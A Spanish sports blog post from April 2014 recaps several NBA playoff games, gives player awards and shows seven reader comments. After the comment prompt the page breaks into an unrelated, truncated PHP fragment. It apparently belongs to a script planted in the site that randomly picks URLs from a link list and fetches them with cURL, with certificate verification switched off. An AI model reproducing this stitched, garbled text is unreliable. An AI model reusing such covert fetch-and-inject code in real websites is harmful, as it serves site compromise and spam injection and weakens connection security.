La Crónica: Dos hombres… ¿y un destino?

25 de April de 2014 por TheDeerHunter

Viejas y extrañas sensaciones para los Thunder en su visita a “La caverna del oso”. Son todo lo buenos que queramos, especialmente en el “clutch time”, pero a la hora de la verdad las prórrogas siempre se las ganan los Grizzlies. Bestia negra.

Déjà vu en varios detalles. Recordamos bien cómo Kevin Durant sufrió empacho de balón en el cruce del año pasado y anoche se repetió la historia: sólo parecían existir Russell Westbrook y él mismo para regocijo de unos rivales cada vez más confiados en defensa y más imprevisibles en ataque. Volvió a palparse también la duda en el incómodo silencio del FeDexForum ante la rara pájara que sufrieron los locales al final del último cuarto, con otro 3+1 inverosímil en esta ocasión de Westbrook, y al inicio del tiempo extra, con 2+1 de Durant… Pero si en algo son especialmente buenos estos Grizzlies es en saber sufrir y encajar golpes para luego devolverlos a su modo. Al modo Tony Allen… Es difícil encontrar palabras a lo que vimos anoche. Es evidente que no es un dechado de talento ni el jugador más inteligente y reflexivo que hayamos visto, tampoco toma siempre las decisiones correctas. Sin embargo, él fue el principal culpable de la asfixia de los Thunder en su peor primera parte del curso (36 puntos), y de uno de los peores partidos en el lanzamiento exterior de toda la carrera de Kevin Durant. No se conformó con ello sinó que volvió a prodigarse con su grano de arena en anotación, con algunos ataques de pura y contagiosa rabia, alternándose en la marca a Westbrook y provocando pérdidas que a la postre fueron decisivas. 

Si no esperábamos el segundo apagón consecutivo de los Thunder en la prórroga, menos aún esperábamos la pelea que están manteniendo los Warriors con su propio tiro exterior. Stephen Curry mejoró en la dirección, pero el que para muchos es el mejor tirador del mundo sigue bastante negado con el aro. Como aspecto positivo hay que remarcar que en esta ocasión los locales mantuvieron la cara al choque en todo momento, controlando bien a Chris Paul y a pesar de que Blake Griffin volvió a hacerles polvo desde el poste y DeAndre Jordan bajo tableros. Como aspecto negativo, por si les faltaba algo, el contagio del pésimo acierto de sus rivales desde la línea de tiros libres. “Winning ugly is beautiful” dijo Doc, y tiene mucha razón. El año pasado los Clippers hubieran perdido un partido como éste, no cerrado a tiempo. Ahora recuperan el factor cancha y dejan tocados anímicamente a sus rivales. El próximo será a vida o muerte para los Warriors.

Dejamos para el final el partido que menos historia tuvo. Tras el segundo partido de la serie nos preguntábamos si habían vuelto los Pacers pero ayer nos encontramos con el mismo equipo desesperante de los últimos meses. Ni se despeinó Atlanta para dominarles durante los 48 minutos con un Jeff Teague crecidoy es que sólo hace falta sentarse y esperar a que fallen sus tiros. Impotencia pura y dura de un equipo a la deriva. Los locales se limitaron a anotar triples y a controlar el tiempo y certificaron su superioridad. El segundo se confirma que fue un espejismo.

PREMIOS

MVP: Blake Griffin resultó imparable por segundo partido consecutivo. 32 puntos, 8 rebotes y 3 asistencias. Sin tanto lustre no podemos olvidarnos de Tony Allen que estuvo en todas las batallas y casi todas las ganó él.

Sorpresa: DeMarre Carroll es un buen jugador pero en demasiadas ocasiones le cuesta producir ofensivamente. Anoche cometió muy pocos errores. 18 puntos con 6 de 8 en tiro y 2 de 4 en triples. Además 4 rebotes, 2 asistencias, 1 robo y ninguna pérdida. Precisamente lo opuesto a los Indiana Pacers.

Decepción: Queda muy claro que en los Pacers cada uno hace ya la guerra por su cuenta. Y si esa guerra la hacen Roy Hibbert, que parece una versión blacksploitation de Frankestein, George Hill con 1 de 11, Paul George con 3 de 11… apaga y vámonos. La degeneración de este equipo deberá ser objeto de estudio en el futuro.

Esfuerzo en vano: No se puede decir que no lo intentaran aunque no estuvieron del todo finos. 60 puntos, 22 rebotes y un largo etcétera de otras cosas para Kevin Durant y Russell Westbrook. Si no logran encontrar un modo de hacer participar al resto del equipo corren el peligro de terminar siendo “el mayor esfuerzo en vano” de toda la primera ronda.

Comenta

7 comentarios a esta entrada

  1. Blade Petrovic dice:
    #1

    Yo creo que el problema de OKC esque solo intervienen dos jugadores en ataque, en mi opinión nose si Brooks o el propio Durant se tienen que dar cuenta y darle más tiro a Ibaka y nose por ejemplo a Butler, jugadores que pueden llevar en parte el juego ofensivo del equipo.
    Por otra parte lo de los Pacers ya es de traca, un equipo de jugadores sobrevalorados y que no estan dando la cara cuando toca

      Citar

  2. jhc dice:
    #2

    Go Hawks!!!!! podemos

      Citar

  3. rumbero dice:
    #3

    Ay esa faltita a Curry en el último tiro…Supongo que había que compensar la falta a Paul en el primer partido. Mañana saldrá la NBA a decir que era falta y todos tan contentos.
    Sólo me ha dado tiempo de ver el último cuarto y me he quedado con las ganas de saber como han sobrevivido los Warriors llevando un 2/24 o así en triples a falta de 6 minutos. Luego sí, Curry y Thompson metiéndolas cuando más quema y con opciones de ganar. Pero como se dice en la crónica, bien los Clippers manejando la presión en una pista tan caliente como el Oracle cuando los Warriors vienen apretando.

    Muy bonita esta primera ronda de PO sino fuera por el juego de los Pacers…

      Citar

  4. Nacho dice:
    #4

    Lo de los Grizzlies se veía venir. Han ocupado un puesto ficticio en la regular. Y quizás solo el hecho de ser quienes son OKC, nos permitía pensar que sería duro, pero que pasarían. Obviamente pueden pasar aún, pero lo de duro se ha convertido en durísimo. Y lo de Tony Allen brutal, ya lo hizo con los Celtics, da ese plus que permite ganar campeonatos. Y es que el basket no son solo números, son sensaciones. Y si no que se lo digan al Madrid, que aún debe pegarse con el cada año ‘menos’ talentoso Olympiakos.

      Citar

  5. Esteban dice:
    #5

    Hibbert es el peor pivote de todos los PO? incluyendo Perkins?

      Citar

  6. Mamba_Blanca dice:
    #6

    Recordemos Esteban, que Perkins forzó la prórroga en el anterior partido de OKC. Mientras tanto Hibbert acumula 18 puntos en 3 partidos; con 7/25 en tiros de campo y 14 rebotes totales para un jugador que alcanza los 218 cm.

    Puede que no sea el peor, pero si la mayor decepción, ya que para Indiana sus opciones de repertir la serie del año pasado o incluso batir a Miami, pasaban en gran medida por que Hibbert dominase de principio a fin a Bosh (tal y como pasó el año pasado)

      Citar

  7. Nacho dice:
    #7

    Bueno, pues Lin enmendó su error del fin del tiempo regular y recuperó el balón que perdía La Barba (cada vez me cae peor, vale que en estos PlayOffs le regalan menos tiros libres, aunque ayer alguno decisivo) para dar la asistencia a Daniels para el triple victorioso. Quizás se lo merecían los Rockets. Pero espero que pasen los Blazers (un equipo que no me cae muy simpático desde que maltrató a Petrovic en aquella final contra los Pistons) porque entre otras cosas se lo merecen.
    Quizás sean el equipo del año, un poco oscurecidos por la sensación Suns. Pero grandes.

    Otra de las sensaciones de la temporada, sobretodo en estos primeros lances de postemporada, los Wizards cayeron ayer ante Chicago. Al lorito con Nene y su pose de favela, porque da miedito. La imagen del brasileño enganchando a Butler (solo pasaba por allí, pero no me come la tostada nadie, por muy grande que sea), con el árbitro pitando la técnica, y que tiene que ir a desengancharlo porque el pivot saca el puño, es bestial..

    Y ayer ganaron unos Nets que me siguen dando buenas sensaciones. Y ya no solo es que quiera que jueguen las finales, es que estoy deseando verlos, sobre todo a Pierce, ante Miami. Y al loro, porque cada día son más viejos y más serios. D-Will empieza a parecerse al de Utah, quizás menos explosivo, pero más serio (Kidd tal vez?), JJ la máquina de siempre y el resto acompañando bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>